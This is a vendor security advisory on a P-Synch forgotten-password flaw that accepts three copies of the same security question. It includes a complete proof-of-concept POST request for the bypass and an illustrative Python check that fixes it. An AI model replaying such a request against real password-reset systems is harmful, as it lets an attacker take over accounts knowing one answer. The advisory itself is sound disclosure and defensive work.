Security Advisory 06 – 003 – P-Synch permits reduced authentication complexity in Forgotten Password mechanism
M-Tech P-Synch Password Management Software
Vulnerability discovery and development:
Portcullis Security Testing Services discovered this vulnerability.
The vulnerability was found and verified against a system running on a Windows 2000 platform.
It was noted that, in addition to the application failing to check that the questions in the supplied POST request correspond to the questions presented to the user, it was possible to supply three instances of the same question and answer pair. Provided the single answer supplied is correct, the application authenticates the user successfully.
An example POST is detailed below:
POST /nph-psf.exe HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.7) Gecko/20050420 Firefox/1.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://192.168.1.1/nph-psf.exe
Content-Type: application/x-www-form-urlencoded
Content-Length: 259

TRANSACTION=C_RESPONSE&SESSKEY=F3zP51t%3D%21qR%5CnvJl%3D%7E0N&LANG=en-us&CSS=docs%2Fen-us%2Fstyle.css&MODEXT=&_VALUE_0=2&_QUES_0=QD-42ae7b35-02484&_VALUE_1=2&_QUES_1=QD-42ae7b35-02484&_VALUE_2=2&_QUES_2=QD-42ae7b35-02484&SUBMIT-QA.x=45&SUBMIT-QA.y=8
In conjunction with the discovery that the application fails to track which questions have been asked, a malicious user who knows the answer to only one of the security questions associated with the target user can authenticate to the P-Synch application and modify the target user's domain password.
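The server-side check that would have closed both gaps, as an added illustration (not P-Synch code): the verifier binds the submitted `_QUES_n` identifiers to the set issued for the session and rejects a submission unless every issued question appears exactly once with a correct answer. The session key, the second and third question identifiers and the stored answers are constructed for the example.

```python
from urllib.parse import parse_qs

# Constructed sample: the question set the server issued for this session.
# Only the first identifier comes from the advisory's POST; the others are invented.
ISSUED_QUESTIONS = {
    "SESSKEY-demo": ["QD-42ae7b35-02484", "QD-42ae7b35-02485", "QD-42ae7b35-02486"],
}

# Constructed sample: the user's enrolled answers (a real store would hold hashes).
STORED_ANSWERS = {
    "QD-42ae7b35-02484": "2",
    "QD-42ae7b35-02485": "blue",
    "QD-42ae7b35-02486": "smith",
}


def extract_pairs(body):
    """Return the (question_id, answer) pairs from a _QUES_n/_VALUE_n form body."""
    form = parse_qs(body, keep_blank_values=True)
    pairs = []
    i = 0
    while f"_QUES_{i}" in form:
        pairs.append((form[f"_QUES_{i}"][0], form.get(f"_VALUE_{i}", [""])[0]))
        i += 1
    return pairs


def verify_challenge(session_key, body):
    """Accept only if the submitted question set equals the issued set, each
    question exactly once, and every answer matches the enrolled one."""
    issued = ISSUED_QUESTIONS.get(session_key)
    if issued is None:
        return False
    pairs = extract_pairs(body)
    submitted_ids = [question_id for question_id, _ in pairs]
    # Multiset comparison: the same identifier repeated three times, a question
    # that was never issued, or a missing question all fail here.
    if sorted(submitted_ids) != sorted(issued):
        return False
    return all(STORED_ANSWERS.get(q) == a for q, a in pairs)
```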
Notified via email 17 February 2006